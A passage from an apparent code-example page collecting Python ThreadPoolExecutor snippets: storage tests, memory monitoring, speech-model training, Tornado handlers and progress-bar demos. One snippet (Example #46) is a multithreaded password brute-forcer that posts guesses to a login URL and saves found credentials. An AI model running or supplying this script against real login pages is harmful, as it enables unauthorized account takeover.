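            cls._executor = ThreadPoolExecutor(1)
        return cls._executor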
Example #38
    def test_worker_node_restart_during_pvc_clone(self, nodes,
                                                  pvc_clone_factory,
                                                  pod_factory):
        """
        Verify PVC cloning will succeed if a worker node is restarted
        while cloning is in progress

        """
        file_name = "fio_test"
        executor = ThreadPoolExecutor(max_workers=len(self.pvcs) + 1)
        selected_node = node.get_nodes(node_type=constants.WORKER_MACHINE,
                                       num_of_nodes=1)

        # Run IO
        log.info("Starting IO on all pods")
        for pod_obj in self.pods:
            storage_type = ("block" if pod_obj.pvc.volume_mode
                            == constants.VOLUME_MODE_BLOCK else "fs")
            pod_obj.run_io(
                storage_type=storage_type,
                size="1G",
                runtime=20,
                fio_filename=file_name,
                end_fsync=1,
            )
            log.info(f"IO started on pod {pod_obj.name}")
        log.info("Started IO on all pods")

        # Wait for IO to finish
        log.info("Wait for IO to finish on pods")
        for pod_obj in self.pods:
            pod_obj.get_fio_results()
            log.info(f"IO finished on pod {pod_obj.name}")
            # Calculate md5sum
            file_name_pod = (file_name if
                             (pod_obj.pvc.volume_mode
                              == constants.VOLUME_MODE_FILESYSTEM) else
                             pod_obj.get_storage_path(storage_type="block"))
            pod_obj.pvc.md5sum = pod.cal_md5sum(
                pod_obj,
                file_name_pod,
                pod_obj.pvc.volume_mode == constants.VOLUME_MODE_BLOCK,
            )

        # Restart node
        log.info(f"Restart node {selected_node[0].name}")
        restart_thread = executor.submit(nodes.restart_nodes,
                                         nodes=selected_node)

        log.info("Creating clone of all PVCs.")
        for pvc_obj in self.pvcs:
            log.info(f"Creating clone of {pvc_obj.name}")
            pvc_obj.clone_proc = executor.submit(pvc_clone_factory,
                                                 pvc_obj=pvc_obj,
                                                 status="")

        # Check result of 'restart_nodes'
        restart_thread.result()

        log.info("Verify status of node.")
        node.wait_for_nodes_status(
            node_names=[node.get_node_name(selected_node[0])],
            status=constants.NODE_READY,
            timeout=300,
        )

        # Get cloned PVCs
        cloned_pvcs = [pvc_obj.clone_proc.result() for pvc_obj in self.pvcs]

        log.info("Verifying cloned PVCs are Bound")
        for pvc_obj in cloned_pvcs:
            wait_for_resource_state(resource=pvc_obj,
                                    state=constants.STATUS_BOUND,
                                    timeout=540)
            pvc_obj.reload()
        log.info("Verified: Cloned PVCs are Bound")

        # Attach the cloned PVCs to pods
        log.info("Attach the cloned PVCs to pods")
        clone_pod_objs = []
        for pvc_obj in cloned_pvcs:
            if pvc_obj.volume_mode == "Block":
                pod_dict_path = constants.CSI_RBD_RAW_BLOCK_POD_YAML
            else:
                pod_dict_path = ""
            clone_pod_obj = pod_factory(
                interface=pvc_obj.parent.interface,
                pvc=pvc_obj,
                status="",
                pod_dict_path=pod_dict_path,
                raw_block_pv=pvc_obj.volume_mode == "Block",
            )
            log.info(
                f"Attaching the PVC {pvc_obj.name} to pod {clone_pod_obj.name}"
            )
            clone_pod_objs.append(clone_pod_obj)

        # Verify the new pods are running
        log.info("Verify the new pods are running")
        for pod_obj in clone_pod_objs:
            wait_for_resource_state(pod_obj, constants.STATUS_RUNNING)
        log.info("Verified: New pods are running")

        # Verify md5sum
        for pod_obj in clone_pod_objs:
            file_name_pod = (pod_obj.get_storage_path(storage_type="block") if
                             (pod_obj.pvc.volume_mode
                              == constants.VOLUME_MODE_BLOCK) else file_name)
            pod.verify_data_integrity(
                pod_obj,
                file_name_pod,
                pod_obj.pvc.parent.md5sum,
                pod_obj.pvc.volume_mode == constants.VOLUME_MODE_BLOCK,
            )
            log.info(
                f"Verified: md5sum of {file_name_pod} on pod {pod_obj.name} "
                f"matches with the original md5sum")
        log.info("Data integrity check passed on all pods")

        # Run IO
        log.info("Starting IO on the new pods")
        for pod_obj in clone_pod_objs:
            storage_type = ("block" if pod_obj.pvc.volume_mode
                            == constants.VOLUME_MODE_BLOCK else "fs")
            pod_obj.run_io(
                storage_type=storage_type,
                size="1G",
                runtime=20,
                fio_filename=f"{file_name}_1",
                end_fsync=1,
            )
            log.info(f"IO started on pod {pod_obj.name}")
        log.info("Started IO on the new pods")

        # Wait for IO to finish
        log.info("Wait for IO to finish on the new pods")
        for pod_obj in clone_pod_objs:
            pod_obj.get_fio_results()
            log.info(f"IO finished on pod {pod_obj.name}")
        log.info("IO finished on the new pods")
Example #39
def measure_memory(is_gpu, func):
    import os
    import psutil
    from time import sleep

    class MemoryMonitor:
        def __init__(self, keep_measuring=True):
            self.keep_measuring = keep_measuring

        def measure_cpu_usage(self):
            max_usage = 0
            while True:
                max_usage = max(
                    max_usage,
                    psutil.Process(os.getpid()).memory_info().rss / 1024**2)
                sleep(0.005)  # 5ms
                if not self.keep_measuring:
                    break
            return max_usage

        def measure_gpu_usage(self):
            from py3nvml.py3nvml import nvmlInit, nvmlDeviceGetCount, nvmlDeviceGetHandleByIndex, \
                                 nvmlDeviceGetMemoryInfo, nvmlDeviceGetName, nvmlShutdown, NVMLError
            max_gpu_usage = []
            gpu_name = []
            try:
                nvmlInit()
                deviceCount = nvmlDeviceGetCount()
                max_gpu_usage = [0 for i in range(deviceCount)]
                gpu_name = [
                    nvmlDeviceGetName(nvmlDeviceGetHandleByIndex(i))
                    for i in range(deviceCount)
                ]
                while True:
                    for i in range(deviceCount):
                        info = nvmlDeviceGetMemoryInfo(
                            nvmlDeviceGetHandleByIndex(i))
                        max_gpu_usage[i] = max(max_gpu_usage[i],
                                               info.used / 1024**2)
                    sleep(0.005)  # 5ms
                    if not self.keep_measuring:
                        break
                nvmlShutdown()
                return [{
                    "device_id": i,
                    "name": gpu_name[i],
                    "max_used_MB": max_gpu_usage[i]
                } for i in range(deviceCount)]
            except NVMLError as error:
                if not self.silent:
                    self.logger.error(
                        "Error fetching GPU information using nvml: %s", error)
                return None

    monitor = MemoryMonitor(False)

    memory_before_test = monitor.measure_gpu_usage(
    ) if is_gpu else monitor.measure_cpu_usage()

    from concurrent.futures import ThreadPoolExecutor
    with ThreadPoolExecutor() as executor:
        monitor = MemoryMonitor()
        mem_thread = executor.submit(
            monitor.measure_gpu_usage if is_gpu else monitor.measure_cpu_usage)
        try:
            fn_thread = executor.submit(func)
            result = fn_thread.result()
        finally:
            monitor.keep_measuring = False
            max_usage = mem_thread.result()

        if is_gpu:
            print(
                f"GPU memory usage: before={memory_before_test}  peak={max_usage}"
            )
            if len(memory_before_test) >= 1 and len(max_usage) >= 1:
                before = memory_before_test[0]["max_used_MB"]
                after = max_usage[0]["max_used_MB"]
                return after - before
            else:
                return None
        else:
            print(
                f"CPU memory usage: before={memory_before_test:.1f} MB, peak={max_usage:.1f} MB"
            )
            return max_usage - memory_before_test
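# A minimal usage sketch for measure_memory above. The allocate() workload is an
# illustrative assumption; the CPU path requires psutil, the GPU path py3nvml.
def allocate():
    data = [0] * 10_000_000   # temporary allocation to make the peak visible
    return len(data)

delta_mb = measure_memory(is_gpu=False, func=allocate)
print("peak CPU memory increase: {:.1f} MB".format(delta_mb))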
Example #40
import time
from concurrent.futures import ThreadPoolExecutor


def basic_func(x):
    if x == 0:
        return 'zero'
    elif x % 2 == 0:
        return 'even'
    else:
        return 'odd'


def multiprocessing_func(x):
    y = x * x
    time.sleep(2)
    print('{} squared results in a/an {} number'.format(x, basic_func(y)))


if __name__ == '__main__':
    starttime = time.time()
    ex = ThreadPoolExecutor(max_workers=10)
    results = ex.map(multiprocessing_func, range(0, 10))
    real_results = list(results)
    print('That took {} seconds'.format(time.time() - starttime))
Example #41
def train():
    parser = argparse.ArgumentParser(
        description="Acoustic model training script")
    pkwrap.script_utils.add_chain_recipe_opts(parser)
    # the idea behind a test config is that one can run different test configurations
    parser.add_argument("--test-config",
                        default="test",
                        help="name of the test to be run")
    parser.add_argument("--decode-iter", default="final")
    parser.add_argument("--config", default="configs/default")
    args = parser.parse_args()

    logging.info("Reading config")
    cfg_parse = configparser.ConfigParser()
    cfg_parse.read(args.config)
    cmd = cfg_parse["cmd"]
    cpu_cmd = cmd['cpu_cmd']
    cuda_cmd = cmd['cuda_cmd']

    exp_cfg = cfg_parse["exp"]
    assert exp_cfg is not None

    stage = args.stage
    model_file = exp_cfg["model_file"]
    data = exp_cfg["data"] if "data" in exp_cfg else "data"
    exp = exp_cfg["exp"] if "exp" in exp_cfg else "exp"
    chain_affix = exp_cfg["chain_affix"] if "chain_affix" in exp_cfg else ""
    chain_dir = os.path.join(exp, f"chain{chain_affix}")
    dirname = os.path.join(chain_dir, exp_cfg["dirname"])
    if not os.path.exists(dirname):
        os.makedirs(dirname)
    egs_dir = os.path.join(dirname, "egs")
    if "e2e" in exp_cfg:
        is_e2e = bool(exp_cfg["e2e"])
    else:
        is_e2e = False
    if not is_e2e:
        gmm_dir = exp_cfg["gmm_dir"]
        ali_dir = exp_cfg["ali_dir"]
        lat_dir = exp_cfg["lat_dir"]
        lores_train_set = exp_cfg["lores_train_set"]
    tree_dir = exp_cfg["tree_dir"]
    train_set = exp_cfg["train_set"]
    lang = exp_cfg["lang"] if "lang" in exp_cfg else "lang"
    lang_chain = exp_cfg[
        "lang_chain"] if "lang_chain" in exp_cfg else "lang_chain"

    l2_regularize = args.l2_regularize

    model_opts = pkwrap.trainer.ModelOpts().load_from_config(exp_cfg)
    frame_subsampling_factor = model_opts.frame_subsampling_factor
    trainer_opts = pkwrap.trainer.TrainerOpts().load_from_config(exp_cfg)

    # create lang folder
    if stage <= 0:
        logging.info("Creating lang_chain folder from lang")
        try:
            rc = subprocess.run([
                "shutil/chain/check_lang.sh",
                lang,
                lang_chain,
            ]).returncode
        except Exception as e:
            #           TODO: should use logging
            sys.stderr.write(str(e))
            sys.stderr.write("ERROR: copying lang failed")
        logging.info(f"Created {lang_chain} folder")
    # create lats
    if stage <= 1:
        logging.info("Create supervision lattices")
        try:
            subprocess.run([
                "steps/align_fmllr_lats.sh",
                "--nj",
                "{}".format(args.decode_nj),
                "--cmd",
                "{}".format(cpu_cmd),
                lores_train_set,
                "{}".format(lang),
                gmm_dir,
                lat_dir,
            ])
        except Exception as e:
            logging.error(e)
            logging.error("Lattice creationg failed")
        logging.info("Finished creating supervision lattices")
    # build tree
    if stage <= 2:
        tree_file = os.path.join(tree_dir, "tree")
        if os.path.isfile(tree_file):
            logging.error(f"Tree file {tree_file} already exists."
                          " Refusing to overwrite".format(tree_file))
            quit(1)
        tree_size = exp_cfg["tree_size"] if "tree_size" in exp_cfg else 7000
        logging.info(f"Using tree_size={tree_size}")
        if not os.path.isfile(os.path.join(tree_dir, '.done')):
            cmd = [
                "steps/nnet3/chain/build_tree.sh",
                "--frame-subsampling-factor",
                f"{frame_subsampling_factor}",
                '--context-opts',
                "--context-width=2 --central-position=1",
                "--cmd",
                "{}".format(cpu_cmd),
                tree_size,
                f"{lores_train_set}",
                f"{lang_chain}",
                f"{ali_dir}",
                f"{tree_dir}",
            ]
            pkwrap.script_utils.run(cmd)
            subprocess.run(["touch", "{}/.done".format(tree_dir)])
    if not os.path.isdir(dirname):
        os.makedirs(dirname)
        logging.info(f"Created {dirname}")
    if not os.path.isfile(os.path.join(dirname, 'tree')):
        shutil.copy(os.path.join(tree_dir, "tree"), dirname)
    learning_rate_factor = 0.5 / args.xent_regularize

    #   create den.fst
    if stage <= 3:
        logging.info("Creating den.fst")
        pkwrap.script_utils.run([
            "shutil/chain/make_den_fst.sh",
            "--cmd",
            f"{cpu_cmd}",
            tree_dir,
            gmm_dir,
            dirname,
        ])

    if not os.path.isfile(os.path.join(dirname, 'num_pdfs')):
        logging.info(f"Creating num_pdfs file in {dirname}")
        num_pdfs = subprocess.check_output([
            "tree-info", os.path.join(tree_dir, "tree")
        ]).decode().strip().split('\n')[0].split()[1]
        with open(os.path.join(dirname, 'num_pdfs'), 'w') as opf:
            opf.write(num_pdfs)
            opf.close()
    if not os.path.isfile(os.path.join(dirname, "0.trans_mdl")):
        pkwrap.script_utils.run([
            "copy-transition-model",
            os.path.join(tree_dir, "final.mdl"),
            os.path.join(dirname, "0.trans_mdl"),
        ])


#   create or copy the egs folder
    context = None
    if stage <= 4 and not ("egs_dir" in exp_cfg and exp_cfg["egs_dir"]):
        logging.info("Creating egs")
        # first check the context
        process_out = subprocess.run([
            model_file,
            "--mode",
            "context",
            "--dir",
            dirname,
            "0.pt",  # use a dummy model. 
        ])
        if process_out.returncode != 0:
            quit(process_out.returncode)
        with open(os.path.join(dirname, 'context')) as ipf:
            context = int(ipf.readline())
        pkwrap.script_utils.run([
            "steps/chain/get_egs.sh", "--cmd", cpu_cmd, "--cmvn-opts",
            "--norm-means=false --norm-vars=false", "--left-context",
            str(context), "--right-context",
            str(context), "--frame-subsampling-factor",
            str(frame_subsampling_factor), "--alignment-subsampling-factor",
            str(frame_subsampling_factor), "--frames-per-iter",
            str(trainer_opts.frames_per_iter), "--frames-per-eg",
            str(trainer_opts.chunk_width), "--srand",
            str(trainer_opts.srand), "--online-ivector-dir",
            trainer_opts.online_ivector_dir, train_set, dirname, lat_dir,
            egs_dir
        ])
    elif "egs_dir" in exp_cfg:
        egs_dir = exp_cfg["egs_dir"]
        if not os.path.exists(os.path.join(dirname, 'context')):
            shutil.copy(os.path.join(egs_dir, 'info', 'left_context'),
                        os.path.join(dirname, 'context'))
    if context is None:
        with open(os.path.join(dirname, 'context')) as ipf:
            context = int(ipf.readline())
    model_opts.load_from_config({
        'left_context': context,
        'right_context': context
    })
    feat_dim_filename = os.path.join(dirname, "feat_dim")
    if not os.path.isfile(feat_dim_filename):
        # if ivector_dim is present in egs_dir, add that to feat_dim
        if os.path.isfile(os.path.join(egs_dir, 'info', 'ivector_dim')):
            feat_dim = 0
            with open(os.path.join(egs_dir, "info", "feat_dim")) as ipf:
                feat_dim = int(ipf.readline().strip())
            with open(os.path.join(egs_dir, "info", "ivector_dim")) as ipf:
                feat_dim += int(ipf.readline().strip())
            with open(feat_dim_filename, 'w') as opf:
                opf.write('{}'.format(feat_dim))
                opf.close()
        else:
            shutil.copy(os.path.join(egs_dir, "info", "feat_dim"), dirname)
    # we start training with
    num_archives = pkwrap.script_utils.get_egs_info(egs_dir)
    num_epochs = trainer_opts.num_epochs
    #           we don't use num of jobs b/c it is 1 for now
    num_archives_to_process = num_archives * num_epochs * frame_subsampling_factor
    num_iters = (num_archives_to_process * 2) // (
        trainer_opts.num_jobs_initial + trainer_opts.num_jobs_final)

    #   TODO: for stages 5 and 6 (and possibly 7), use ChainTrainer
    #   start the training
    if stage <= 5:
        logging.info("Initializing model")
        process_out = subprocess.run([
            *cuda_cmd.split(),
            os.path.join(dirname, "log", "init.log"), model_file, "--mode",
            "init", "--dir", dirname,
            os.path.join(dirname, "0.pt")
        ])
        if process_out.returncode != 0:
            quit(process_out.returncode)

    if stage <= 6:
        train_stage = trainer_opts.train_stage
        logging.info(f"Starting training from stage={train_stage}")
        assert train_stage >= 0
        num_archives_processed = 0
        for iter_no in range(0, num_iters):
            num_jobs = pkwrap.script_utils.get_current_num_jobs(
                iter_no,
                num_iters,
                trainer_opts.num_jobs_initial,
                1,  # we don't play with num-jobs-step
                trainer_opts.num_jobs_final)
            if iter_no < train_stage:
                num_archives_processed += num_jobs
                continue
            assert num_jobs > 0
            lr = pkwrap.script_utils.get_learning_rate(
                iter_no,
                num_jobs,
                num_iters,
                num_archives_processed,
                num_archives_to_process,
                trainer_opts.lr_initial,
                trainer_opts.lr_final,
                schedule_type='exponential')
            diagnostic_job_pool = None
            if iter_no % trainer_opts.diagnostics_interval == 0:
                diagnostic_job_pool = submit_diagnostic_jobs(
                    dirname,
                    model_file,
                    iter_no,
                    egs_dir,
                    cuda_cmd,
                    ivector_dir=trainer_opts.online_ivector_dir)
            logging.info(
                "{} Running iter={} of {} with {} jobs and lr={:.6f}".format(
                    datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"),
                    iter_no, num_iters, num_jobs, lr))
            with ThreadPoolExecutor(max_workers=num_jobs) as executor:
                job_pool = []
                for job_id in range(1, num_jobs + 1):
                    frame_shift = num_archives_processed % frame_subsampling_factor
                    p = executor.submit(
                        run_job,
                        num_jobs,
                        job_id,
                        dirname,
                        iter_no,
                        model_file,
                        lr,
                        frame_shift,
                        egs_dir,
                        num_archives,
                        num_archives_processed,
                        exp_cfg["minibatch_size"],
                        cuda_cmd,
                        ivector_dir=trainer_opts.online_ivector_dir)
                    num_archives_processed += 1
                    job_pool.append(p)
                for p in as_completed(job_pool):
                    if p.result() != 0:
                        quit(p.result())
            if num_jobs > 1:
                model_list = [
                    os.path.join(dirname, "{}.{}.pt".format(iter_no, job_id))
                    for job_id in range(1, num_jobs + 1)
                ]
                process_out = subprocess.run([
                    *cuda_cmd.split(),
                    "{}/log/merge.{}.log".format(dirname,
                                                 iter_no + 1), model_file,
                    "--dir", dirname, "--mode", "merge", "--new-model",
                    os.path.join(dirname, "{}.pt".format(iter_no + 1)),
                    ",".join(model_list)
                ])
                for mdl in model_list:
                    pkwrap.script_utils.run(["rm", mdl])
            else:
                pkwrap.script_utils.run([
                    "mv",
                    os.path.join(dirname, "{}.1.pt".format(iter_no)),
                    os.path.join(dirname, "{}.pt".format(iter_no + 1)),
                ])
            # remove the model from 10 iterations back unless it falls on a checkpoint
            if iter_no >= 20 and (iter_no -
                                  10) % trainer_opts.checkpoint_interval != 0:
                mdl = os.path.join(dirname, "{}.pt".format(iter_no - 10))
                if os.path.isfile(mdl):
                    pkwrap.script_utils.run(["rm", mdl])
        # do final model combination
        model_list = [
            os.path.join(dirname, f"{i}.pt")
            for i in range(num_iters, num_iters - 10, -1)
        ]
        logging.info("Final model combination...")
        diagnostic_name = 'valid'
        egs_file = os.path.join(egs_dir,
                                '{}_diagnostic.cegs'.format(diagnostic_name))
        ivector_opts = []
        if trainer_opts.online_ivector_dir:
            ivector_opts = ["--use-ivector", "True"]
        pkwrap.script_utils.run([
            *cuda_cmd.split(), "{}/log/combine.log".format(dirname),
            model_file, "--dir", dirname, "--mode", "final_combination",
            "--new-model",
            os.path.join(dirname, "final.pt"), "--egs",
            "ark:{}".format(egs_file), *ivector_opts, ",".join(model_list)
        ])

    graph_dir = ""
    decode_params = cfg_parse[args.test_config]
    if "graph_dir" in exp_cfg:
        graph_dir = exp_cfg["graph_dir"]
    if "graph_dir" in decode_params:
        graph_dir = decode_params["graph_dir"]
    if not graph_dir:
        graph_dir = os.path.join(dirname, 'graph')
    if stage <= 7:
        if not os.path.isfile(os.path.join(graph_dir, 'HCLG.fst')):
            logging.info("Making graph with {}".format(exp_cfg["lang"]))
            pkwrap.script_utils.run([
                'utils/mkgraph.sh', '--self-loop-scale', '1.0',
                exp_cfg["lang"], tree_dir, graph_dir
            ])

    if stage <= 8:
        final_iter = num_iters - 1
        data_dir = decode_params["test_set"]
        data_name = os.path.basename(data_dir)
        decode_iter = decode_params[
            "iter"] if "iter" in decode_params else "final"
        decode_affix = decode_params[
            "suffix"] if "suffix" in decode_params else ""
        decode_suff = "_iter{}{}".format(decode_iter, decode_affix)
        out_dir = os.path.join(dirname, f"decode_{data_name}{decode_suff}")
        graph = "{}/HCLG.fst".format(graph_dir)
        if "num_jobs" in decode_params:
            num_jobs = pkwrap.utils.split_data(
                data_dir,
                int(decode_params["num_jobs"]),
            )
        else:
            num_jobs = pkwrap.utils.split_data(data_dir)
        logging.info(f"Decoding with {num_jobs} jobs...")

        ivector_opts = []
        if "ivector_dir" in decode_params and len(
                decode_params["ivector_dir"]) > 0:
            ivector_opts = ["--ivector-dir", decode_params["ivector_dir"]]

        if "apply_cmvn" in decode_params and bool(decode_params["apply_cmvn"]):
            use_cmvn = True
            cmvn_opts = decode_params["cmvn_opts"]
            utt2spk_name = "ark:{}/split{}/JOB/utt2spk".format(
                data_dir, num_jobs)
            feats_name = "scp:{}/split{}/JOB/feats.scp".format(
                data_dir, num_jobs)
            cmvn_name = "scp:{}/split{}/JOB/cmvn.scp".format(
                data_dir, num_jobs)
            feats_scp = "ark,s,cs:apply-cmvn {} --utt2spk={} {} {} ark:- |".format(
                cmvn_opts, utt2spk_name, cmvn_name, feats_name)
        else:
            feats_scp = "scp:{}/split{}/JOB/feats.scp".format(
                data_dir, num_jobs)
        pkwrap.script_utils.run([
            *cpu_cmd.split(), "JOB=1:{}".format(num_jobs),
            os.path.join(out_dir, "log",
                         "decode.JOB.log"), model_file, "--dir", dirname,
            "--mode", "decode", *ivector_opts, "--decode-feats", feats_scp,
            os.path.join(dirname, "{}.pt".format(decode_iter)), "|",
            "shutil/decode/latgen-faster-mapped.sh",
            os.path.join(graph_dir, "words.txt"),
            os.path.join(dirname, "0.trans_mdl"), graph,
            os.path.join(out_dir, "lat.JOB.gz")
        ])
        with open(os.path.join(out_dir, 'num_jobs'), 'w') as opf:
            opf.write('{}'.format(num_jobs))
        logging.info("Scoring...")
        if not os.path.isfile(os.path.join(out_dir, '../final.mdl')) and \
            os.path.isfile(os.path.join(out_dir, '../0.trans_mdl')):
            pkwrap.script_utils.run([
                "ln",
                "-r",
                "-s",
                os.path.join(out_dir, '../0.trans_mdl'),
                os.path.join(out_dir, '../final.mdl'),
            ])
        pkwrap.script_utils.run(
            ["local/score.sh", "--cmd", cpu_cmd, data_dir, graph_dir, out_dir])
        logging.info(f"Printing best WER...")
        pkwrap.script_utils.run(" ".join(
            ["cat", "{}/wer*".format(out_dir), "|", "utils/best_wer.sh"]),
                                shell=True)
Example #42
0
    def exec(self):
        pool = ThreadPoolExecutor(10)

        host_list = self.get_host_list()
        for host in host_list:
            pool.submit(self.task, host['hostname'])
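The loop above never shuts the pool down. A minimal sketch of the same idea with the executor as a context manager, so the pool is closed and every submitted task is awaited when the block exits (run_on_hosts and the host dicts are illustrative names, not part of the example):

from concurrent.futures import ThreadPoolExecutor

def run_on_hosts(task, host_list, max_workers=10):
    # Context-manager form: shutdown(wait=True) happens implicitly on exit.
    with ThreadPoolExecutor(max_workers) as pool:
        for host in host_list:
            pool.submit(task, host['hostname'])

# run_on_hosts(print, [{'hostname': 'web-01'}, {'hostname': 'web-02'}])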
Example #43
0
 def __init__(self, bound, max_workers):
     self.executor = ThreadPoolExecutor(max_workers=max_workers)
     self.semaphore = BoundedSemaphore(bound + max_workers)
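A minimal sketch of how this bounded-executor fragment is typically completed: the semaphore blocks submit() once `bound` tasks are queued beyond the workers and is released when a future finishes. The class name, the submit() wrapper and shutdown() below are assumptions, not part of the snippet above.

from concurrent.futures import ThreadPoolExecutor
from threading import BoundedSemaphore

class BoundedExecutor:
    """ThreadPoolExecutor whose submit() blocks when the backlog is full."""

    def __init__(self, bound, max_workers):
        self.executor = ThreadPoolExecutor(max_workers=max_workers)
        self.semaphore = BoundedSemaphore(bound + max_workers)

    def submit(self, fn, *args, **kwargs):
        self.semaphore.acquire()  # block here when the queue is full
        try:
            future = self.executor.submit(fn, *args, **kwargs)
        except Exception:
            self.semaphore.release()
            raise
        future.add_done_callback(lambda _: self.semaphore.release())
        return future

    def shutdown(self, wait=True):
        self.executor.shutdown(wait=wait)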
Example #44
0
    if auto_position:
        # we think we know about other bars (currently only py3 threading)
        if n == 6:
            tqdm.write("n == 6 completed")

if sys.version_info[:1] > (2,):
    progresser_thread = partial(progresser, auto_position=True)
else:
    progresser_thread = progresser


if __name__ == '__main__':
    freeze_support()  # for Windows support
    print("Multi-processing")
    p = Pool(len(L), initializer=tqdm.set_lock, initargs=(tqdm.get_lock(),))
    p.map(progresser, L)

    # unfortunately need ncols
    # to print spaces over leftover multi-processing bars (#796)
    with tqdm(leave=False) as t:
        ncols = t.ncols or 80
    print(("{msg:<{ncols}}").format(msg="Multi-threading", ncols=ncols))

    with ThreadPoolExecutor(4) as p:
        p.map(progresser_thread, L)

    print("Manual nesting")
    for i in trange(16, desc="1"):
        for _ in trange(16, desc="2 @ %d" % i, leave=i % 2):
            sleep(0.01)
 def __init__(self, evaluator, n_worker=1):
     self.evaluator = evaluator
     self.n_worker = n_worker
     self.thread_pool = ThreadPoolExecutor(max_workers=n_worker)
Example #46
0

def ta(q):
    p = "demo"

    print("正在爆破" + str(q))
    kv = {
        "username": p,
        "password": q,
        "encodedPassword": "",
        #        "captcha":"ceems",
        "message": ""
    }
    try:
        r = requests.post(url, kv, headers=headers, allow_redirects=False)
        print(r.status_code)
        if r.status_code == 302:
            print("密码为" + q)
            with open("用户名.txt", "a") as f:
                f.write(p + "\t" + q + "\n")
            exit()

    except:
        exit()


pool = ThreadPoolExecutor(10)
for index in lt_11:
    pool.submit(ta, index)
print("end")
Example #47
0
class docTypeHandler(baseHandler):
    executor = ThreadPoolExecutor(50)  # start a thread pool, held by this RequestHandler

    # @tornado.web.asynchronous
    @tornado.gen.coroutine
    def post(self):
        logging.info(
            '#####################################################################'
        )
        logging.info('Document Type - Start : ' +
                     time.asctime(time.localtime(time.time())))
        logging.info(
            '#####################################################################'
        )
        try:
            if self.request.headers.get("Content-Type") == "application/json":
                # logging.info(self.request.body)
                reqData = json.loads(self.request.body)

                signRslt = self.verify_sign()

                if signRslt['success']:
                    try:
                        imgBase64 = reqData['image']
                        api_id = reqData['api_id']

                        _docType, _confidence = yield self._docTypePredict(
                            imgBase64)

                        _rslt = {}
                        _rslt['docType'] = _docType
                        _rslt['confidence'] = _confidence

                        self.write_json(data=_rslt)

                    except KeyError as e:
                        self.write_json(
                            data={},
                            ret=10005,
                            msg='Invalid JSON format, missing api_id/image')
                    except Exception as e:
                        self.write_json(data={}, ret=10002, msg=str(e))
                else:
                    self.write_json(data={}, ret=10003, msg=signRslt['msg'])
            else:
                self.write_json(data={},
                                ret=10004,
                                msg='Content-Type need to be application/json')
        except Exception as e:
            self.write_json(data={}, ret=10005, msg=str(e))

    @run_on_executor
    def _docTypePredict(self, imgBase64):
        # Convert the base64 to PIL image
        __img = readImage(imgBase64, outFormat='PIL')
        __imgGrey = __img.convert('L')

        # Get Doc Type by running predict model
        docType, confidence = _docClass.predict(__imgGrey)

        return docType, confidence
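A distilled sketch of the Tornado pattern used in the handler above: a class-level ThreadPoolExecutor plus @run_on_executor so a blocking call can be yielded from a coroutine. SlowHandler and blocking_predict are illustrative names, not from the example.

import time

import tornado.gen
import tornado.ioloop
import tornado.web
from concurrent.futures import ThreadPoolExecutor
from tornado.concurrent import run_on_executor


class SlowHandler(tornado.web.RequestHandler):
    # one pool per handler class; @run_on_executor looks it up as self.executor
    executor = ThreadPoolExecutor(4)

    @tornado.gen.coroutine
    def get(self):
        result = yield self.blocking_predict()
        self.write({'result': result})

    @run_on_executor
    def blocking_predict(self):
        time.sleep(1)  # stands in for a CPU/IO-heavy model call
        return 'done'


if __name__ == '__main__':
    app = tornado.web.Application([(r'/', SlowHandler)])
    app.listen(8888)
    tornado.ioloop.IOLoop.current().start()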
Example #48
0
class EnvironmentHandler(tornado.web.RequestHandler):
    executor = ThreadPoolExecutor(30)

    @tornado.web.asynchronous
    @tornado.gen.coroutine
    def get(self, APIName):
        yield self.execute_get(APIName)

    @tornado.web.asynchronous
    @tornado.gen.coroutine
    def post(self, APIName):
        yield self.execute_post(APIName)

    @run_on_executor
    def execute_get(self, APIName):
        dataResult = DataResult()
        try:
            tasks = {
                'getEnvironmentInfoById':
                lambda: self.getEnvironmentInfoById(),
                'getEnvironmentInfos':
                lambda: self.getEnvironmentInfos(),
                'getEnvironmentInfoByUserId':
                lambda: self.getEnvironmentInfoByUserId()
                # lambda alias
            }
            self.write(json.dumps(tasks[APIName]().__dict__, cls=CJsonEncoder))
        except:
            logger.error(traceback.format_exc())
            dataResult.setMessage(traceback.format_exc())
            dataResult.setSuccess(False)
            dataResult.setStatusCode(500)
            self.write(json.dumps(dataResult.__dict__))
        finally:
            try:
                self.finish()
            except:
                pass

    @run_on_executor
    def execute_post(self, APIName):
        dataResult = DataResult()
        try:
            tasks = {
                'addEnvironmentItem': lambda: self.addEnvironmentItem(),
                'deleteEnvironmentItem': lambda: self.deleteEnvironmentItem(),
                'editEnvironmentItem': lambda: self.editEnvironmentItem()
            }
            self.write(json.dumps(tasks[APIName]().__dict__, cls=CJsonEncoder))
        except:
            logger.error(traceback.format_exc())
            dataResult.setMessage(traceback.format_exc())
            dataResult.setSuccess(False)
            dataResult.setStatusCode(500)
            self.write(json.dumps(dataResult.__dict__))
        finally:
            try:
                self.finish()
            except:
                pass

    def getEnvironmentInfoById(self):
        envId = self.get_argument('envId')
        return EnvironmentService().getEnvironmentInfoById(envId)

    @AdminDecoratorServer.webInterceptorDecorator(SystemConfig.adminHost)
    def addEnvironmentItem(self):
        return EnvironmentService().addEnvironmentItem(
            json.loads(self.request.body))

    @AdminDecoratorServer.webInterceptorDecorator(SystemConfig.adminHost)
    def deleteEnvironmentItem(self):
        return EnvironmentService().deleteEnvironmentItem(
            json.loads(self.request.body))

    def editEnvironmentItem(self):
        return EnvironmentService().editEnvironmentItem(
            json.loads(self.request.body))

    def getEnvironmentInfos(self):
        return EnvironmentService().getEnvironmentInfos()

    def getEnvironmentInfoByUserId(self):
        useId = self.get_argument('userId')
        return EnvironmentService().getEnvironmentInfosByUserId(useId)
Example #49
0
 def __new__(cls, *args, **kwargs):
     if not getattr(cls, '_instance', None):
         cls._instance = ThreadPoolExecutor(max_workers=10)
     return cls._instance
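A short sketch of how this singleton __new__ behaves in use: every instantiation returns the same ThreadPoolExecutor, so __init__ is never run on it. SharedPool is an assumed wrapper name for illustration.

from concurrent.futures import ThreadPoolExecutor

class SharedPool:
    """Every instantiation returns the same process-wide executor."""

    def __new__(cls, *args, **kwargs):
        if not getattr(cls, '_instance', None):
            cls._instance = ThreadPoolExecutor(max_workers=10)
        return cls._instance

pool_a = SharedPool()
pool_b = SharedPool()
assert pool_a is pool_b  # both names point at one executor
pool_a.submit(print, "runs on the shared pool").result()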
def compare_results(f_block, l_block, url1, url2, max_tries=10, timeout=0.1):
    global wdir
    global errors

    print("Compare blocks [{} : {}]".format(f_block, l_block))

    for i in range(f_block, l_block + 1):
        request = bytes(
